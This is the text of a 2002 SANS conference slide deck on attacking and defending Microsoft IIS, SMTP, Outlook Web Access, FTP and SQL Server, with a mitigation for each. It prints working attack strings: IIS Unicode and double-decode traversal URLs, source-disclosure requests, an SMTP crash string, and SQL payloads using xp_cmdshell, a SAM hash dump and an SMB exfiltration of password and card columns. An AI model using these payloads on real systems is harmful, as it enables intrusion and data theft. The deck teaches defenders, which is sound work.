Slide 1

Slide 1 text

SMASHING WINDOWS Attacking and Defending Windows Internet Services H D Moore Digital Defense Inc.

Slide 2

Slide 2 text

SANS 2002 2 Introduction • H D Moore – Senior Analyst at Digital Defense – 5 years experience penetration testing – Contact: [email protected] • Digital Defense – Founded January 2000 – Provide recurring assessment services – Specialize in financial industry

Slide 3

Slide 3 text

SANS 2002 3 Agenda – Quick Overview – Internet Information Server – Microsoft SMTP Service – Outlook Web Access – Microsoft FTP Service – Microsoft SQL Server – Demos / Questions

Slide 4

Slide 4 text

1/26/2016 SANS 2002 4 Quick Overview • Why should you sit through this? – Learn how crackers get in – Learn how to assess your own systems – See why network worms are so effective – Demonstrate why a patch needs to be applied – Actually verify that a patch worked – Check new software for related problems

Slide 5

Slide 5 text

SANS 2002 5 Quick Overview • Why bother with assessing Windows? – Over 30% of all of web sites run on Windows – Popular online banking and e-commerce platform – Incredibly easy to install and start using – Most services have insecure default settings – Isn’t it secure with patches? Just wait a week…

Slide 6

Slide 6 text

(a.k.a Incredibly Insecure System) IIS Internet Information Server

Slide 7

Slide 7 text

SANS 2002 7 IIS – Security Overview • What is IIS? – Microsoft’s Web Server Product – Standard component of Windows 2000+ – Aims to be easy to use and extend – Horrible security architecture – Most features are enabled by default – Every version to date has been vulnerable to a remote shell granting attack in its default configuration.

Slide 8

Slide 8 text

SANS 2002 8 IIS - Usage • Where is IIS used? – Corporate Web Sites – E-Commerce Sites – Online Banking Systems – Intranet/Internal Sites – With other products • Sendmail for Windows – Various “appliances” • Cisco VOIP systems

Slide 9

Slide 9 text

SANS 2002 9 IIS – Usage • Why is it used? – Provided with the operating system – Very user-friendly configuration – Large number of ASP/CF developers – Huge feature set, easy to extend – Integrates with a Windows network – Decent performance by comparison

Slide 10

Slide 10 text

SANS 2002 10 IIS - Vulnerabilities • Three Primary Sources of Vulnerabilities – ISAPI Extensions • Code Red Worm – Sample Scripts • RDS Exploit – IIS Core • ::$DATA • Unicode • Double Decode

Slide 11

Slide 11 text

SANS 2002 11 IIS – ISAPI Extensions • What is an ISAPI extension? – Adds functionality to IIS – Usually in the form of a DLL – ASP, CFML, PHP are extensions – Usually tied to specific suffix (.asp, .ida) • Types of security problems – Buffer Overflows – Information Disclosure

Slide 12

Slide 12 text

SANS 2002 12 IIS – ISAPI Extensions • Why are they such a security risk? – Code is not as well reviewed as core IIS – Extensions are enabled by default – Extension code can execute as SYSTEM • Where are the extensions shown? – Open Internet Services Manager – Select Web Site -> Properties – Home Directory -> Configuration

Slide 13

Slide 13 text

SANS 2002 13 IIS – ISAPI Extensions Extension Configuration

Slide 14

Slide 14 text

SANS 2002 14 IIS – ISAPI Vulnerabilities • Remote Code Execution – Overflow in ISM.dll (.htr) • Overflow in URL at ~3000 bytes • Exploit code was released 2 years ago • Only affects pre-SP6 IIS 4.0 servers – Overflow in IDQ.dll (.idq) • Overflow in Host header at ~220 bytes • “Code Red” used this to propagate • Affects both IIS 4.0 and 5.0

Slide 15

Slide 15 text

SANS 2002 15 IIS – ISAPI Vulnerabilities • Remote Code Execution – Overflow in MSW3PRT.dll (.printer) • Overflow is in the Host: header at ~240 bytes • Exploit code in wide circulation and very effective • Affects Windows 2000 / IIS 5.0 only – Overflow in ActiveState PerlIIS.dll (.plx) • Overflow in URL at ~340 bytes • Exploit code in circulation • Affects ActiveState Perl 5.6.1 < build 630

Slide 16

Slide 16 text

SANS 2002 16 IIS – ISAPI Vulnerabilities • Information Disclosure – Source disclosure with ISM.dll (.htr) • http://server/somescript.asp+.htr • http://server/somescript.asp?(%20 * 230).htr – Source disclosure with WEBHITS.dll (.htw) • http://server/null.htw?CiWebHitsFile=/default.asp%20

Slide 17

Slide 17 text

SANS 2002 17 IIS – ISAPI Vulnerabilities • Information Disclosure – Physical path disclosure in IDQ.dll (.idq) • http://server/nonexistent.idq • http://server/nonexistent.ida – Physical path disclosure in HTTPODBC.dll (.idc) • http://server/nonexistent.idc

Slide 18

Slide 18 text

SANS 2002 18 IIS – ISAPI Solutions • Remove Everything! (almost) – There are only a few extensions most people actually need: .asp, .asa, .shtml, .shtm. – Extensions like .php and .cfml are usually ok provided that they are at the latest patch level.

Slide 19

Slide 19 text

SANS 2002 19 IIS – ISAPI Solutions

Slide 20

Slide 20 text

SANS 2002 20 IIS – ISAPI Solutions

Slide 21

Slide 21 text

SANS 2002 21 IIS – Sample Scripts • The problem with sample scripts – Demonstrate possibly dangerous features – Included as part of a default install – Have absolutely no access control – Unaffected by service packs and hotfixes – Often located in a different volume and added as a virtual directory, allowing other vulnerabilities to be further exploited.

Slide 22

Slide 22 text

SANS 2002 22 IIS – Sample Scripts • Vulnerabilities in Sample Scripts – View Arbitrary files • Multiple ShowCode.asp scripts – Remote Database Access • The infamous /MSADC/msadcs.dll (RDS) • adctest.exe, mkilog.exe, ctss.idc – Guess/Change User Accounts • All the scripts in /IISADMPWD/ – Network Tunnels • Port relaying via /rpc/rpcproxy.dll

Slide 23

Slide 23 text

SANS 2002 23 IIS – Sample Scripts

Slide 24

Slide 24 text

SANS 2002 24 IIS – Sample Scripts • Sample Scripts - Solution – Actually delete sample files – Remove the Virtual Directories – Select “Custom Install” next time

Slide 25

Slide 25 text

SANS 2002 25 IIS – Core • What problems exist in the core server? – File System Quirks – “Translate: f” Bug – Directory Traversal – IIS WebDav Features

Slide 26

Slide 26 text

SANS 2002 26 IIS – Core • File System Quirks – DOS 8.3 File Names – Bypass IIS ACL’s • Affects pre-SP6 IIS 4.0 • http://server/protected/ ( becomes) • http://server/protec~1/ – NTFS File Streams – Access Source • Affects pre-SP6 IIS 4.0 • http://server/login.asp::$DATA

Slide 27

Slide 27 text

SANS 2002 27 IIS – Core • “Translate: f” Bug – Retrieve the source of any file on the server: GET /global.asa\ HTTP/1.0 Translate: f – Affects Windows 2000 pre-SP1 only

Slide 28

Slide 28 text

SANS 2002 28 IIS – Core • What is Directory Traversal? – Most file systems use two special directory names to refer to the current and parent directory. – A single period “.” refers to the current directory. – A double period “..” refers to the directory above. – Directory traversal bugs are dependent on these special directory names to access files outside of the defined root directory

Slide 29

Slide 29 text

SANS 2002 29 IIS – Core • Directory Traversal – Win9x “…” – Windows 9x supports multiple-dot parent paths • http://server/……………/autoexec.bat • http://server/……/windows/command.com?echo+hello – Works on Win9x machines running IIS or PWS – Other web servers on Win9x have been vulnerable

Slide 30

Slide 30 text

SANS 2002 30 IIS – Core • Directory Traversal – UNICODE – Windows supports a two-byte character encoding system called “UNICODE”. – Alternate character sets can used to make web requests by requesting their hexified values – The “/” and “\” characters can be represented with their UNICODE counterparts and older IIS versions will allow requests UNDER the web root. – Affects IIS 4.0 and IIS 5.0 – Other web servers may be affected

Slide 31

Slide 31 text

SANS 2002 31 IIS – Core • Directory Traversal – UNICODE – Example: (%c0%af = “/”) • http://server/.. %c0%af.. %c0%af../boot.ini – Number of variations depends on installed langs – Possible to execute \winnt\system32\cmd.exe – Exploited by many different worms – Very popular exploit among “kids”

Slide 32

Slide 32 text

SANS 2002 32 IIS – Core • Directory Traversal – Double Decode – Requests for files in an executable directory are hex-decoded twice and the final result is not checked for parent paths. – Example: • %25 = “%” AND %5c = “\” • Request: http://server/scripts/..%255c../ • First Decode: http://server/scripts/..%5c../ • Second Decode: http://server/scripts/..\../ – IIS 3.0, 4.0, 5.0 are affected

Slide 33

Slide 33 text

SANS 2002 33 IIS – Core

Slide 34

Slide 34 text

SANS 2002 34 IIS – Core • IIS WebDav Features – DAV is Distributed Authoring and Versioning – WebDav provides content mgmt via HTTP – WebDav is accessed as HTTP methods – XML used for complex requests – A “normal” web request GET / HTTP/1.0 – A WebDav request PUT /newpage.html HTTP/1.0

Slide 35

Slide 35 text

SANS 2002 35 IIS – Core • IIS WebDav Features – OPTIONS • OPTIONS / HTTP/1.0 • Returns a list of allowed HTTP methods • Methods in Allow: are accessible – SEARCH • Able to retrieve a directory listing through XML

Slide 36

Slide 36 text

SANS 2002 36 IIS – Core • IIS WebDav Features – PUT • Common among misconfigured IIS 4.0 servers • Allows direct file uploads via WebDav (FrontPage) – DELETE • Common among misconfigured IIS 4.0 servers • Allows deletion of any file in the web root

Slide 37

Slide 37 text

SANS 2002 37 IIS – Core • IIS WebDav Features – MOVE • Common among misconfigured IIS 4.0 servers • Allows you to move any file or directory – MKDIR/MKCOL • Only found on machines with really bad permissions • Allows creation of directories

Slide 38

Slide 38 text

SANS 2002 38 IIS – Core • IIS WebDav Features – COPY • Most servers allow this, but it rarely works • Copy / HTTP/1.0 • Destination: http://nuthaserver/newdir/ – PROPFIND • Allowed by default • Needs XML input to do anything interesting • Various DoS attacks with long args to this command

Slide 39

Slide 39 text

SANS 2002 39 IIS – Summary • A remote compromise is practically guaranteed by the number of vulnerabilities in a default installation. • Microsoft’s “feature push” strategy to encourage upgrades ensures there will be always be new vulnerabilities. • The amount of effort, knowledge, and time required to effectively secure an IIS server means that only experienced, security-aware administrators, have a chance of succeeding. • Microsoft is making attempts to simplify the assessment and patching process by releasing free security tools.

Slide 40

Slide 40 text

SANS 2002 40 IIS – Questions ?

Slide 41

Slide 41 text

“I send you this file in order to have your advice” - Sircam Worm IMS Microsoft Internet Mail Service

Slide 42

Slide 42 text

SANS 2002 42 IMS – Security Overview • What is IMS? – IMS supports the Simple Mail Transport Protocol – Part of Windows NT 4.0 Option Pack – Comes standard with Windows 2000 – Aims to be easy to use and configure – Often overlooked when it comes to security

Slide 43

Slide 43 text

SANS 2002 43 IMS – Security Overview • What problems exist? – Unauthorized Mail Relaying – Denial of Service Attacks – Information Gathering

Slide 44

Slide 44 text

SANS 2002 44 IMS - Vulnerabilities • Unauthorized Mail Relaying – Misconfigured Mail Servers • Verify that relaying is turned off or at least properly configured – Windows 2000 SMTP Auth Bypass • AUTH GSSAPI

Slide 45

Slide 45 text

SANS 2002 45 IMS – Vulnerabilities • Denial of Service Attacks – IMS + Exchange 5.5 Empty Character Set • Email with: charset = “” – Windows 2000 BDAT/AUTH Crash • BDAT 4\r\nb00mAUTH LOGIN\r\n\r\n\r\n\r\n

Slide 46

Slide 46 text

SANS 2002 46 SMTP – Vulnerabilities • Information Gathering – “Bounce” messages can contain sensitive information about a company’s internal network and domain – The AUTH and XAUTH commands can be used to brute-force user accounts through SMTP

Slide 47

Slide 47 text

SANS 2002 47 SMTP – Summary • Many SMTP servers are misconfigured or buggy in a way that allows spam relaying. • The SMTP service can be used to gather sensitive information about a network • While a few DoS conditions exist, newer versions of Windows automatically restart a crashed service.

Slide 48

Slide 48 text

SANS 2002 48 SMTP – Questions ?

Slide 49

Slide 49 text

(The CEO wants WHAT installed?) OWA Microsoft Outlook Web Access

Slide 50

Slide 50 text

SANS 2002 50 OWA – Security Overview • What is Outlook Web Access? – Web mail client for Microsoft Exchange – Runs on top of IIS 4.0 or 5.0 – Emulates the Outlook interface – Written in ASP, uses COM+ objects

Slide 51

Slide 51 text

SANS 2002 51 OWA – Security Overview • What problems exist? – All IIS vulnerabilities apply – Defaults to clear text HTTP transport – Anonymous access enabled by default – Allows exploitation of client-side bugs

Slide 52

Slide 52 text

SANS 2002 52 OWA – Vulnerabilities • OWA runs on IIS – Many people forget to include OWA machines when applying patches to their “web servers” – Crackers and worms don’t care what it is, as long as it’s running the IIS web server – Cracking the OWA machine provides full access to login and mail ASP scripts

Slide 53

Slide 53 text

SANS 2002 53 OWA – Vulnerabilities • Defaults to Clear Text – Many people run OWA across regular HTTP, allowing their login and email to be easily sniffed – Enabling SSL is not too difficult, provided you know how to configure SSL under IIS.

Slide 54

Slide 54 text

SANS 2002 54 OWA – Vulnerabilities • Anonymous Access by Default – A default install allows full access to the Global Address List to unauthenticated users – “Public Folders” are exactly that, viewable by anyone able to access the server

Slide 55

Slide 55 text

SANS 2002 55 OWA – Vulnerabilities • Exploitation of Client Side Bugs – It is possible to embed a hostile application into an email message and force it to run when a user reads their email via Internet Explorer – There are various “Cross Site Scripting” issues with OWA which could allow someone to read any cookies or email contents

Slide 56

Slide 56 text

SANS 2002 56 OWA – Summary • Outlook Web Access is a fairly dangerous application to maintain just to provide access to email over the web. • The actual OWA scripts have been proven to be pretty solid, most of the issues are with the underlying IIS server or the default config. • If you do run OWA, please stay on top of IIS patches, disable anonymous access, and keep sensitive information out of “Public Folders”

Slide 57

Slide 57 text

SANS 2002 57 OWA – Questions ?

Slide 58

Slide 58 text

“So that’s how we do Bill Pay…” FTP The Microsoft FTP Service

Slide 59

Slide 59 text

SANS 2002 59 FTP – Security Overview • What is the FTP service? – The File Transfer Protocol – THE method of transmitting stored files – Part of Windows NT 4.0 Option Pack – Comes standard with Windows 2000 – Easy to configure and use

Slide 60

Slide 60 text

SANS 2002 60 FTP – Security Overview • What problems exist? – Unencrypted login and transfer – Anonymous access by default – Predictable PASV port selection – SITE STATS information leak – STAT Globbing Attack

Slide 61

Slide 61 text

SANS 2002 61 FTP – Vulnerabilities • Unencrypted login and transfer – Authentication information is sent in clear text and trivial to capture – The actual file transfers are unencrypted and easy to sniff and extract

Slide 62

Slide 62 text

SANS 2002 62 FTP – Vulnerabilities • Anonymous Access by Default – The default installation allows access using the standard “anonymous” and “ftp” account – Systems with bad permissions for the FTP root are automatically turned into warez servers for the various pirate groups

Slide 63

Slide 63 text

SANS 2002 63 FTP – Vulnerabilities • Predictable PASV Port – FTP uses one connection from the client to port 21 on the server as the “control” port – Directory listings and file transfers are done via a second connection – Active FTP uses a connection from the server to the client – Passive FTP opens a port on the server and the client connects to it

Slide 64

Slide 64 text

SANS 2002 64 FTP – Vulnerabilities • Predictable PASV Port – Many FTP servers use single-incrementing port numbers for the “passive” data port – With MS FTP 4.0, it is possible to guess the next data port and steal another user’s file transfer – With MS FTP 5.0, a hijack attempt will just disconnect and the client’s FTP session becomes unusable – Automated tools exist to exploit this

Slide 65

Slide 65 text

SANS 2002 65 FTP – Vulnerabilities • SITE STATS Information Leak – The SITE STATS feature shows how many times each FTP command has been executed – An anonymous user can profile a FTP server to determine when other users are logging on – The statistics can reveal what privileged commands are being executed and at what time – Usage profiles can be used in conjunction with the PASV port attack to steal scheduled transfers

Slide 66

Slide 66 text

SANS 2002 66 FTP – Vulnerabilities • SITE STATS Information Leak – Sample output from ftp.XiXroXoXt.com DELE : 19993 MKD : 12260 RETR : 4157300 STOR : 34736 USER : 5829438 PASS : 5792087

Slide 67

Slide 67 text

SANS 2002 67 FTP – Vulnerabilities • STAT Globbing Attack – MS notified early Dec. – No fix available yet – MS FTP 4.0 and 5.0 vulnerable – Crashes ALL IIS services • STAT *? – Possibly exploitable

Slide 68

Slide 68 text

SANS 2002 68 FTP – Summary • The FTP protocol was never designed with security in mind. • The secondary data channel does not require authentication and is trivial to hijack. • If you must run FTP, please encrypt AND sign your files before transferring.

Slide 69

Slide 69 text

SANS 2002 69 FTP – Questions ?

Slide 70

Slide 70 text

(Where did your data go today?) MSSQL Microsoft SQL Server

Slide 71

Slide 71 text

SANS 2002 71 MSSQL – Security Overview • What is SQL Server? – Microsoft’s relational database product – Originally based on the Sybase engine – Often installed with other products – Ships by default on many vendor machines – “Personal” editions exist for client systems – Popular backend for web applications • E-Commerce • Financial Services

Slide 72

Slide 72 text

SANS 2002 72 MSSQL – Security Overview • Security Issues – Service runs as Administrator or SYSTEM – Default accounts are the biggest problem – SQL User Level Privilege Escalation – Service is easily located on the network – Dangerous Stored Procedures – Syntax optimal for SQL insertion attacks

Slide 73

Slide 73 text

SANS 2002 73 MSSQL – Vulnerabilities • Service Runs as Administrator or SYSTEM – A compromise of the “sa” account results in full access to the entire system – Any bugs in the listening service or query parser could result in a complete system compromise

Slide 74

Slide 74 text

SANS 2002 74 MSSQL – Vulnerabilities • Default Accounts are the Biggest Problem – The all-powerful “sa” account often has no password set, newer versions try to force it. – The “probe” account in 6.5 is unprivileged, but gaining “sa” access is trivial in that version. – A network worm appeared in late November 2001, exploiting the default “sa” account and propagating via stored procedures.

Slide 75

Slide 75 text

SANS 2002 75 MSSQL – Vulnerabilities • SQL User Level Privilege Escalation – SQL 7.0 Trusted Connections SELECT * FROM OPENROWSET('SQLOLEDB', 'Trusted_Connection=Yes;Data Source=myserver', 'SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"') – Buffer overflows in Extended Stored Procedures

Slide 76

Slide 76 text

SANS 2002 76 MSSQL – Vulnerabilities • Service is Easily Located on the Network – Use the SQLPing utility – Use osql -L – SQL Server can use these transports: • TCP/IP(TCP 1433, UDP 1433, 1434) • MS RPC (dynamic ports) • Named Pipes • IPX/SPX / AppleTalk / Banyan Vines

Slide 77

Slide 77 text

SANS 2002 77 MSSQL – Vulnerabilities • Dangerous Stored Procedures – The infamous xp_cmdshell EXEC master..xp_cmdshell “cmd.exe /c …” – Sending query results back to you via SMB EXEC master..sp_makewebtask “\\ip\tmp\test.html”, “SELECT username, password,cc from users” – Dump the SAM password hashes via xp_regread EXEC xp_regread HKLM, 'SECURITY\SAM\Domains\Account ','F'

Slide 78

Slide 78 text

SANS 2002 78 MSSQL – Vulnerabilities • Syntax Optimal for SQL Insertion Attacks – Queries can be stacked via semi-colon SELECT * FROM cats WHERE id = 4; UPDATE USER SET … – Comments can be inserted inline SELECT * FROM users WHERE user = ‘bob’;-- ‘ AND password = “bad password” – The engine provides verbose error messages about SQL syntax problems

Slide 79

Slide 79 text

SANS 2002 79 MSSQL – Summary • Compromising the “sa” account is almost always equivalent to having local Administrator access to the SQL Server machine (hint: don’t run a database on your DC’s). • Since SQL Server supports so many different network protocols, a simple packet filter on ports 1433/1434 is usually not enough to restrict access. • Recent versions of MS-SQL (2k+) are slightly more secure out of the box, the “Typical” install only allows Domain Authentication.

Slide 80

Slide 80 text

SANS 2002 80 MSSQL – Questions ?